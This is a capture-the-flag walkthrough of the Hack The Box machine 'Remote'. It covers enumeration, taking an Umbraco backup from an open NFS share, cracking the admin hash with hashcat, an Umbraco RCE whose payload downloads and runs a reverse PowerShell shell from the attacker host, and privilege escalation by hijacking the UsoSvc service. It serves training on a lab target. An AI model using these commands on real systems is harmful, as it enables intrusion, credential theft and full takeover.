Remote.htb

Remote.htb

This is a detailed walk-thru for remote.htb written by dR1PPy

The challenge given by Remote will have you breaking into the Umbraco CMS system on multiple levels.

Enumeration

Nmap scan report for 10.10.10.180
Host is up, received user-set (0.11s latency).
Scanned at 2020-03-30 22:14:16 MDT for 209s
Not shown: 993 closed ports
Reason: 993 conn-refused
PORT     STATE SERVICE       REASON  VERSION
21/tcp   open  ftp           syn-ack Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack
2049/tcp open  mountd        syn-ack 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m29s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 45222/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 53672/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 19556/udp): CLEAN (Timeout)
|   Check 4 (port 15893/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-31T04:19:18
|_  start_date: N/A

During some manual enumeration we come across possible usernames.

Usernames:

Using the information on the website we create a username file to help us in our attack.

users.txt

Jan Skovgaard
Matt Brailsford
Lee Kelleher
Jeavon Leopold
Jeroen Breuer

We also find an open share which seems to hold a backup files. We mount this directory locally to review it more closely.

showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)
sudo mount 10.10.10.180:/site_backups /tmp/001
cd /tmp/001
[dr1ppy:/tmp/001] $ ls -lha
total 179K
drwx------  2 nobody 4294967294 4.0K Feb 23 11:35 .
drwxrwxrwt 37 root   root        56K Mar 30 23:41 ..
drwx------  2 nobody 4294967294   64 Feb 20 10:16 App_Browsers
drwx------  2 nobody 4294967294 4.0K Feb 20 10:17 App_Data
drwx------  2 nobody 4294967294 4.0K Feb 20 10:16 App_Plugins
drwx------  2 nobody 4294967294   64 Feb 20 10:16 aspnet_client
drwx------  2 nobody 4294967294  48K Feb 20 10:16 bin
drwx------  2 nobody 4294967294 8.0K Feb 20 10:16 Config
drwx------  2 nobody 4294967294   64 Feb 20 10:16 css
-rwx------  1 nobody 4294967294  152 Nov  1  2018 default.aspx
-rwx------  1 nobody 4294967294   89 Nov  1  2018 Global.asax
drwx------  2 nobody 4294967294 4.0K Feb 20 10:16 Media
drwx------  2 nobody 4294967294   64 Feb 20 10:16 scripts
drwx------  2 nobody 4294967294 8.0K Feb 20 10:16 Umbraco
drwx------  2 nobody 4294967294 4.0K Feb 20 10:16 Umbraco_Client
drwx------  2 nobody 4294967294 4.0K Feb 20 10:16 Views
-rwx------  1 nobody 4294967294  28K Feb 19 22:57 Web.config

The entire backup is about 80mb so let’s just copy the data over, to make it easier to analyze.

rsync -avz /tmp/001/* .

This will also allows a quick view of all the files contained in the backup.
While waiting for the backup to complete we look over the files and notice is they appear to be the root umbraco folder.

We verify this by trying to access the following URL.
https://10.10.10.180/umbraco/

Gaining Access

A Google search shows us the App_Data folder is where most of our Umbraco configuration would be found.

strings Umbraco.sdf 
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32

We crack the password for Administrator

hashcat -m 100 hash.txt -o cracked-hash.txt /TOOL/rockyou.txt 
hashcat (v5.1.0) starting...

* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) Core(TM) i7-3632QM CPU @ 2.20GHz, 3990/15961 MB allocatable, 8MCU

OpenCL Platform #2: The pocl project
====================================
* Device #2: pthread-Intel(R) Core(TM) i7-3632QM CPU @ 2.20GHz, skipped.

Hashfile 'hash.txt' on line 2 (jxDUCc...KA3htB/ERiyJUAdpTtFeTpnIk9CiHts=): Token length exception
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=8 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=3 -D DGST_R1=4 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=5 -D KERN_TYPE=100 -D _unroll'
* Device #1: Kernel m00100_a0-pure.8a2b2872.kernel not found in cache! Building may take a while...
Compilation started
Compilation done
Linking started
Linking done
Device build started
Device build done
Kernel <gpu_decompress> was not vectorized
Kernel <gpu_memset> was not vectorized
Kernel <gpu_atinit> was not vectorized
Kernel <m00100_mxx> was not vectorized
Kernel <m00100_sxx> was not vectorized
Done.
Dictionary cache hit:
* Filename..: /TOOL/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384


Session..........: hashcat
Status...........: Cracked
Hash.Type........: SHA1
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Fri Apr 24 09:29:36 2020 (3 secs)
Time.Estimated...: Fri Apr 24 09:29:39 2020 (0 secs)
Guess.Base.......: File (/TOOL/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4227.9 kH/s (0.65ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 9830400/14344384 (68.53%)
Rejected.........: 0/9830400 (0.00%)
Restore.Point....: 9822208/14344384 (68.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: badboi5410 -> babypolk07

Started: Fri Apr 24 09:29:30 2020
Stopped: Fri Apr 24 09:29:40 2020

cat cracked-hash.txt 
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese

Now with our password we confirm our access thru the CMS portal.
https://10.10.10.180/umbraco/

Now we have access to the portal and can confirm the version of Umbraco

A quick web search leads us to the following RCE PoC code.

https://github.com/noraj/Umbraco-RCE

Looks like we should be able to get the RCE working on our target.

First we prepare a quick reverse Powershell script.

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1
sed -i 's/#$client/$client/g' Invoke-PowerShellTcpOneLine.ps1  && sed -i 's/#$sm/$sm/g' Invoke-PowerShellTcpOneLine.ps1 && sed -i 's/192.168.254.1/10.10.14.32/g' Invoke-PowerShellTcpOneLine.ps1

Then we run our exploit.

python ./exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.32:6767/windows-meterpreter-stageless-reverse-tcp-8383.ps1')"

And we get our first shell.

nc -lvp 4545
listening on [any] 4545 ...
connect to [10.10.14.32] from remote.htb [10.10.10.180] 49747
id
PS C:\windows\system32\inetsrv>

ԅ(≖‿≖ԅ)

Escalating Privileges

Now we have a solid shell we run thru our starting lineup of Windows Enumeration scripts.

winPEAS
PowerUp
Watson
Seatbelt
Powerless
JAWS

When we get to the 2nd script where we find a bit of Juicy information.

[*] Checking service permissions...


ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True

It appears we can change and restart the ‘UsoSvc’ which we quickly confirm with another payload

copy \\10.10.14.32\drip\payload.exe C:\Windows\System32\spool\drivers\color\exploit.exe
cmd /c sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: UsoSvc
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
PS C:\Windows\System32\spool\drivers\color> cmd /c sc config "UsoSvc"  binPath="C:\Windows\System32\spool\drivers\color\exploit.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\Windows\System32\spool\drivers\color> cmd /c sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: UsoSvc
        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\spool\drivers\color\exploit.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

PS C:\Windows\System32\spool\drivers\color> cmd /c sc stop "UsoSvc"

SERVICE_NAME: UsoSvc 
        TYPE               : 30  WIN32  
        STATE              : 3  STOP_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530
PS C:\Windows\System32\spool\drivers\color> cmd /c sc start "UsoSvc"

And we get our root shell =^)

But it quickly dies =^(

So we enable the MSF Auto Migration Post script to jump us to another process before our shell dies.

set AutoRunScript post/windows/manage/migrate

Now we start the service again and we get our final shell and grab our root flag.

Resources

As always here is a list of resources and reference materials used for this walk thru

LINQPad
https://www.linqpad.net/Download.aspx

Umbraco backup and deploying notes
https://stackoverflow.com/questions/36608378/which-umbraco-folders-do-i-need-to-backup-after-deploying-from-vs-and-adding-to

Umbraco RCE
https://github.com/noraj/Umbraco-RCE

Invoke-PowerShellTcpOneLine.ps1
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1

PowerUp.ps1
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

Abusing Weak Service Permissions
https://pentestlab.blog/2017/03/30/weak-service-permissions/

List of writeable Windows Paths
https://raw.githubusercontent.com/api0cradle/UltimateAppLockerByPassList/master/Generic-AppLockerbypasses.md

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: